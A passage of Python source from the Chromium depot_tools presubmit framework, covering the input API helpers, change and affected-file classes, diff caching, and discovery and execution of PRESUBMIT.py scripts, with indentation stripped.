# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
and InputApi.DEFAULT_BLACK_LIST is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return filter(source_file, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
unsplit_footers = git_footers.parse_footers(self._full_description).get(
'Bug', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = filter(file_filter, self._affected_files)
if include_deletes:
return affected
return filter(lambda x: x.Action() != 'D', affected)
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.itervalues():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
map(os.remove, input_api._named_temporary_files)
if not (isinstance(result, types.TupleType) or
isinstance(result, types.ListType)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format() for error in errors
],
'notifications': [
notification.json_format() for notification in notifications
],
'warnings': [
warning.json_format() for warning in warnings
]
}
gclient_utils.FileWrite(json_output, json.dumps(presubmit_results))
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.iteritems():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
